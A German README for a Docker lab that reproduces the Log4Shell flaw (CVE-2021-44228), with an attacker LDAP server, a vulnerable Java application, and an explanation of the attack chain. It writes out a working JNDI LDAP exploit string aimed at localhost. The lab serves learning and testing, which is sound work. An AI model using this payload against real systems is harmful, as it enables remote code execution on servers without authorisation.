CVE-2021-44228 (Log4Shell) Laborumgebung für Sicherheitslücken
Einleitung
Dieses Projekt bietet eine dockerisierte Umgebung, um die kritische Log4j-Sicherheitslücke CVE-2021-44228 (Log4Shell) sicher zu üben und zu verstehen.
Hauptmerkmale
- Sichere dockerisierte Testumgebung
- Möglichkeit zum Testen benutzerdefinierter Payloads
- Enthält einen LDAP-Server des Angreifers und eine angreifbare Java-Anwendung
Erste Schritte
docker compose up --build
Payload-Tests
- Sie können den Payload im Testabschnitt von
/vulnerable/Makefile ändern
- Der Standard-Payload verwendet
$${jndi:ldap://127.0.0.1:10000/}
Funktionsweise
- Die angreifbare Java-Anwendung startet
- Der LDAP-Server des Angreifers lauscht auf Port 10000
- Die angreifbare Anwendung läuft
- Der Log4Shell-Payload wird über den Makefile-Testabschnitt in der angreifbaren Anwendung protokolliert
- Die angreifbare Anwendung versucht eine JNDI-LDAP-Abfrage
- Der LDAP-Server gibt eine schädliche Java-Klasse zurück
- Die angreifbare Anwendung lädt und führt diese Klasse aus